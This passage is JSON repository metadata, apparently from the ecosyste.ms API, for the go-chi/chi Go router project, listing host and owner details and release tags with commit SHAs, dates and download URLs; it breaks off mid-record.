analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/